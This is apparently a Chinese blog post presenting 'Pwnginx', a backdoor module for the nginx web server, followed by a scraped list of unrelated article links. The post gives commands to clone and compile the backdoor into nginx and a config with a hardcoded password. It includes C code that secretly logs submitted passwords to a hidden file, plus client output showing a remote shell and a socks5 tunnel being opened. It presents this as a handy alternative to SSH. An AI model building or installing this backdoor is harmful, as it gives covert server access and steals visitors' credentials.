Pwnginx – a nginx backdoor offering shell
Nginx(发音同 engine x)是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个BSD-like 协议下发行。由俄罗斯的程序设计师Igor Sysoev所开发,供俄国大型的入口网站及搜索引擎Rambler(俄文:Рамблер)使用。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好.中国大陆使用nginx网站用户有:新浪、网易、 腾讯等。
Nginx代码完全用C语言从头写成,已经移植到许多体系结构和操作系统,包括:Linux、FreeBSD、Solaris、Mac OS X、AIX以及Microsoft Windows。Nginx有自己的函数库,并且除了zlib、PCRE和OpenSSL之外,标准模块只使用系统C库函数。而且,如果不需要或者考虑到潜在的授权冲突,可以不使用这些第三方库。
作为邮件代理服务器:Nginx 同时也是一个非常优秀的邮件代理服务器(最早开发这个产品的目的之一也是作为邮件代理服务器),Last. fm 描述了成功并且美妙的使用经验。
Nginx 是一个安装非常的简单,配置文件非常简洁(还能够支持perl语法),Bugs非常少的服务器:Nginx 启动特别容易,并且几乎可以做到7*24不间断运行,即使运行数个月也不需要重新启动。你还能够不间断服务的情况下进行软件版本的升级。
Tm3y锅锅一直是我偶像,即使他不在360了,他写得这东西是一个Nginx的模块,为了减少你服务器的使用资源,使用此模块你可以不必要安装Telnet Openssh-server等等远程服务,或者有你可以通过Ningx开启一个socks5代理来访问内部资源
Nginx的无缝升级和添加模块一直是很方便,添加这个模块到你服务器非常简单
[root@centos6 nginx-1.5.2]# /pen/evil/n/sbin/nginx -V nginx version: nginx/1.5.2 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) configure arguments: --prefix=/pen/evil/n --without-http_rewrite_module --without-http_gzip_module [root@centos6 nginx-1.5.2]# git clone https://github.com/t57root/pwnginx.git [root@centos6 nginx-1.5.2]# ./configure --prefix=/pen/evil/n --without-http_rewrite_module --without-http_gzip_module --add-module=./pwnginx/module/ [root@centos6 nginx-1.5.2]# make && make install
然后重启你的Nginx就行,编译你时候你需要定义写东西
[root@centos6 module]# cat config.h #ifndef CONFIG_H #define CONFIG_H#define PASSWORD "t57root" #define PWD_SNIFF_FILE "/tmp/.web_sniff" #define ROOTSHELL#endif [root@centos6 module]#
还能进行sniff Http哦~
if (r->request_body){ngx_chain_t *cl = r->request_body->bufs;if(cl){//1024char *tmp_buf = malloc(1025);tmp_buf[1024]='\0';strncpy(tmp_buf,(char *)cl->buf->pos,1024);if( ngx_strcasestrn((u_char *)tmp_buf, "password=",9-1) ||ngx_strcasestrn((u_char *)tmp_buf, "passwd=",7-1) ||ngx_strcasestrn((u_char *)tmp_buf, "pwd=",4-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"password\"",15-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"passwd\"",13-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"pwd\"",10-1)){FILE *fp = fopen(PWD_SNIFF_FILE,"a");r->request_line.data[(int)r->request_line.len]='\0';fprintf(fp,"%s\n",(char *)r->request_line.data);r->headers_in.host->value.data[(int)r->headers_in.host->value.len]='\0';fprintf(fp,"Host:%s\n",(char *)r->headers_in.host->value.data);fprintf(fp,"%s\n======================\n",cl->buf->pos);fclose(fp);}}}
获得一个SHELL:
[root@centos6 client]# ./pwnginx shell 127.0.0.1 80 t57root [ Pwnginx ] - Pwn nginx Copyleft by t57root @ openwill.me <t57root@gmail.com> [www.HackShell.net]Usage: Get a shell access via the nginx running @ [ip]:[port]./pwnginx shell [ip] [port] [password] Get a socks5 tunnel listening at [socks5ip]:[socks5port]./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port][i] Obtaining shell access [i] About to connect to nginx[i] Enjoy the real world. id uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
源代码和详细说明你可以在TM3Y的GIT里找到:https://github.com/t57root/pwnginx
Update :内网的Nginx 貌似不能用,测试了N多
Pwnginx – a nginx backdoor offering shell相关推荐
- java利用友盟 计算pv uv_通过nginx日志利用shell统计日pv和uv
通过nginx日志利用shell统计日pv和uv 网上记录nginx日志统计访问量的脚本的文档很多,但是看来看去实际都是一个东西,如下: 1.根据访问IP统计UV awk '{print $1}' ...
- php管理nginx虚拟主机shell脚本
使用php作为shell脚本是一件很方便的事情.理所当然,我们可以使用php脚本来管理 nginx虚拟主机,下面是笔者的 脚本 文件供各位参考 代码如下 复制代码 #!/usr/bin/php -q ...
- nginx linux脚本,shell脚本之nginx自动化脚本
这个脚本,可以满足nginx开启,停止和重启的操作 #!/bin/bash . /etc/init.d/functions function usage() { echo $"usage:$ ...
- Shell脚本和Python查看Nginx并发连接数、进程数和常驻内存占用情况
Shell脚本查看Nginx并发连接数.进程数和常驻内存占用情况 http://xiaoyongxing1.blog.163.com/blog/static/642807522015144302240 ...
- nginx的重定向,反向代理以及负载均衡
试验环境: 本次试验中的服务器全用的是CentOS-6.4-x86_64操作系统: nginx服务器地址:192.168.80.10 客户端主机地址:192.168.80.1 软件包下载地址: hea ...
- ansible playbook实战——下发部署nginx以及更新、回滚
之前介绍了 ansible 的安装配置及实例:http://msiyuetian.blog.51cto.com/8637744/1748143 以及 ansible 的 playbook 详解:htt ...
- linux sed 测试文件夹,测试开发笔记二(Linux与Shell脚本)
01 | Linux系统和Shell环境准备 运行shell test.sh #!/bin/bash echo "hello" 运行脚本 方式一: chmod+x ./test.s ...
- nginx+tornado与nginx+go的性能测试
记录一下: nginx做反向代理,单纯测试框架. 机器配置: Intel® Core™ i5-3470 CPU @ 3.20GHz 4核心 8G内存 test.go: <!-- lang: cp ...
- Centos 利用yum源安装 nginx 1.20.1
环境 CentOS 7.9 (腾讯云服务器) nginx 1.20.1 yum源说明 腾讯云的 CentOS 服务器,用的是腾讯的yum源镜像. 感兴趣的可以去/etc/yum.repos.d中看看. ...
最新文章
- x86汇编从实模式到保护模式-程序加载器
- C语言满分代码:L1-056 猜数字 (20分)
- 圣三一学院计算机专业,360教育集团:爱尔兰都柏林大学圣三一学院计算机专业...
- 数列分块入门 9(LibreOj-6285)
- java执行多次post请求_同样的post请求代码在Java和android中执行结果不同。
- WCF在安全性方面的支持(1):一些概念
- linux安装python_Linux下安装python环境
- 阿里最“短命”P10员工?曝前百度云高管加盟钉钉不足三周被开除
- CSRF手工测试方法
- 【数字信号去噪】基于matlab遗传算法优化变分模态分解VMD数字信号去噪(目标函数为样本熵)【含Matlab源码 1982期】
- 暴风影音内MEE引擎揭秘
- 数学对于编程有多重要?
- 最新封装版EVE模拟器部署和使用说明(图文版)
- java关于Exception(异常)的详解
- Android证书信任问题与大表哥
- 苹果手机使用技巧篇:教你完美使用好苹果手机的4个方法
- Thread dump文件抓取和分析(JCA工具)
- 目前所有ewebeditor版本***的漏洞与问题总结
- 第二章、application.properties文件的配置
- python自定义事件event的含义_事件Event详解
热门文章
- Nginx安装与使用
- 结对项目——可循环的最大子数组
- 【Python爬虫网站数据实战】Python爬虫 统计淘宝商品数据+数据可视化
- 计算机课情感态度与价值观,浅谈信息技术课中情感态度价值观的培养
- vue使用JavaScript的Number方法或正则表达式进行表单验证,判断值是否为数字(包括整数和小数),验证值只能为小数点后一位
- 软件性能测试报告收费,软件性能测试报告模板
- cesium中限制地图浏览范围
- gin 【日志记录】每天一个日志文件
- 非常精妙的主副电源自动切换电路,并且“零”压降
- 中国民生银行天眼日志平台架构演进的平凡之路